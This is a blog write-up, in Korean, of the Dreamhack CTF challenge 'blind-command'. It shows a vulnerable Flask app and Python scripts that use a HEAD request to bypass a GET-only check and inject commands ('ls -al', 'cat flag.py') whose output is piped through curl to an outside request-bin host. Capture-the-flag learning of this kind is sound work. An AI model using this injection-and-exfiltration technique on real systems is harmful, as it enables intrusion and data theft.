[Dreamhack] Level 2: blind-command

CTF, War game

[Dreamhack] Level 2: blind-command

mnzy🌱 2024. 6. 29. 04:08

1. 문제

https://dreamhack.io/wargame/challenges/73

blind-command

Read the flag file XD Reference Web Hacking

dreamhack.io

flag file을 읽으라고 되어있다.

2. 해결 과정

(1) 문제 페이지 확인

?cmd=hi를 주면 화면에 그대로 문자열이 출력된다.

(2) 코드 확인

cmd의 쿼리값을 받아 실행하는 전형적인 command injection 취약점이 존재하는 페이지이다.

그러나 GET 으로 요청을 받아올 때가 아니라 다른 방법으로 cmd값을 줄 때만 이를 실행하는 것이다.

또한 실행 결과를 브라우저에서 확인할 수 없다.

#!/usr/bin/env python3
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/' , methods=['GET'])
def index():
    cmd = request.args.get('cmd', '')
    if not cmd:
        return "?cmd=[cmd]"

    if request.method == 'GET':
        ''
    else:
        os.system(cmd)
    return cmd

app.run(host='0.0.0.0', port=8000)

따라서 POST 메서드로 ls-al을 실행해보고 내 서버에 그 결과값을 보내도록 요청을 보내보는 코드를 작성해보았지만, 서버에서 POST 요청을 허용하지 않는다고 한다.

그래서 OPTIONS 요청을 보내서 어떤 메서드가 허용되는지 확인해보았다.

그 결과 GET, HEAD, OPTIONS 메서드를 허용하고 있는 것을 알 수 있었다.

(HTTP HEAD method는 GET method가 허용되는 곳에는 반드시 허용된다.)

import requests

url = 'http://host3.dreamhack.games:24513/'

try:
    response = requests.options(url)

    # 응답 출력
    if 'allow' in response.headers:
        allowed_methods = response.headers['allow']
        print(f'Supported methods for {url}: {allowed_methods}')
    else:
        print(f'No allowed methods information found in response headers.')
except requests.exceptions.RequestException as e:
    print(f'An error occurred: {e}')

이후에는 GET 메서드에 대한 우회를 구글링해보았다.

참고 블로그 ▼

Check logic vulnerability point using GET/HEAD in Ruby on Rails

최근에 Github OAuth flow bypass 취약점이 공개되었습니다. 이 취약점은 Rails 앱의 특성을 이용한 취약점이고, Github만의 문제가 아니고 패치로 모든 Rails 앱을 보호할 수도 없습니다. Today, I going to review

www.hahwul.com

https://blog.teddykatz.com/2019/11/05/github-oauth-bypass.html

Bypassing GitHub’s OAuth flow

For the past few years, security research has been something I’ve done in my spare time. I know there are people that make a living off of bug bounty programs, but I’ve personally just spent a few hours here and there whenever I feel like it.

blog.teddykatz.com

HEAD메서드는 일반적으로 GET 메서드와 유사하게 요청을 보내지지만, body값이 존재하지 않는다.

중요한 것은 결국 서버에서는 HEAD 요청에 대해서도 GET 요청이었을 때와 동일한 헤더 필드를 응답으로 보내야 한다는 것이다.

- 단, 페이로드 헤더 필드(예: Content-Length)는 생략될 수 있다.

이렇게 페이로드 실행은 HEAD요청으로 진행할 수 있지만, 우리는 그 결과를 알기 위해서 body값에 내용을 받아와야 한다.

따라서, 서버에는 HEAD요청을 보내고, 그 결과를 POST 요청으로 내가 지정한 서버에 전송할 수 있도록 스크립트를 짤 수 있다.

ls -al을 실행하고 그 결과를 내 서버에 보내는 스크립트를 작성하였다.

import requests

url = 'http://host3.dreamhack.games:24513/?cmd='
target_server = 'https://sbqbwyf.request.dreamhack.games/'

cmd = 'ls -al'
full_cmd = f"{cmd} | curl -X POST -d @- {target_server}"

encoded_cmd = requests.utils.quote(full_cmd)

full_url = f"{url}{encoded_cmd}"

try:
   
    response = requests.head(full_url)

    print(f"Response headers: {response.headers}")
    print(f"Response status code: {response.status_code}")
    
except requests.exceptions.RequestException as e:
    print(f"An error occurred: {e}")

실행 결과, 플래그 파일(flag.py)을 확인할 수 있었다.

따라서 이 파일을 읽어오는 스크립트를 작성하여 실행해보면 될 것 같다.

cat을 통해 flag.py 파일을 읽고 그 결과를 지정 서버로 보내는 스크립트를 작성하였다.

import requests

url = 'http://host3.dreamhack.games:24513/?cmd='
target_server = 'https://sbqbwyf.request.dreamhack.games/'

cmd = 'cat flag.py'
full_cmd = f"{cmd} | curl -X POST -d @- {target_server}"

encoded_cmd = requests.utils.quote(full_cmd)

full_url = f"{url}{encoded_cmd}"

try:
    response = requests.head(full_url)

    print(f"Response headers: {response.headers}")
    print(f"Response status code: {response.status_code}")
    
except requests.exceptions.RequestException as e:
    print(f"An error occurred: {e}")

그 결과 플래그를 얻을 수 있었다.